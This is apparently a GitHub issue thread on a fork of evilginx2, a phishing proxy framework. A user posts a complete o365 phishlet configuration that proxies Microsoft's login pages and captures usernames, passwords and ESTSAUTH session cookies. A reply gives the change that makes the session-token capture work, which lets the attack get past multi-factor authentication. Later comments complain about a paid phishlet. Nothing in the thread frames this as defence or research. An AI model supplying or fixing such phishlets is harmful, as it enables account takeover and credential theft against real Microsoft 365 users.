hash3liZer / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication


MFA Tokens not capture

bhatsy06 opened this issue · comments

I have installed evilginx2 per the instructions here. I have set up a lure for o365 using default settings. For some reason, even when I am doing MFA using SMS on my phone for Microsoft, I am not seeing the MFA token being captured. Is there anything I need to add to the o365.yaml file to make this work? I have the blacklist set to unauth.
/evilginx2/phishlets$ more o365.yaml
name: 'o365'
author: '@JamesCullum'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
  # The lines below are needed if your target organization utilizes ADFS.
  # If they do, you need to uncomment all following lines that contain <...>
  # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
  # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as follows:
  # = adfs
  # = example.com
  # = adfs.example.com
  #- {phish_sub: 'adfs', orig_sub: '', domain: '', session: true, is_landing:false}
  #- {phish_sub: 'adfs', orig_sub: '', domain: ':443', session: true, is_landing:false}
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  # Uncomment and fill in if your target organization utilizes ADFS
  #- {triggers_on: '', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH','ESTSAUTHPERSISTENT','SignInStateCookie']
  - domain: 'login.microsoftonline.com'
    keys: ['ESTSAUTH','ESTSAUTHPERSISTENT','SignInStateCookie']
credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password)'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'

I was able to resolve this by updating the phishlet as shown. Basically, remove the "domain: 'login.microsoftonline.com'
keys: ['SignInStateCookie']" entry and condense it into just one as shown below. Hope this helps someone else looking into this.

auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
credentials:
  username:

Hey, I was trying to figure out how you updated the file with the code you claim fixed the problem, because I'm having the same problem: I don't receive any results, login or token, no matter what I tried.

I'M VERY DISAPPOINTED AT THE OWNER ITSELF @Mrgretzky. I REALLY LOVE YOUR TOOLS; I ONLY HAD AN ISSUE AND WAS TRYING TO GET THE UPDATE YOU CLAIM. I PAID HIM, HE SENT ME A YAML FILE THAT DOESN'T WORK, WORSE THAN EVEN THE ONE IN THE FREE TOOLS. AND SINCE HE DOESN'T REPLY TO MY MESSAGE, THAT'S JUST SAD, CAUSE I DID TRUST YOU.

Hey, @LekinriGhost @bhatsy06, I am reviewing this project for now. Are there any problems with it for now? Let me know so I can close the issues.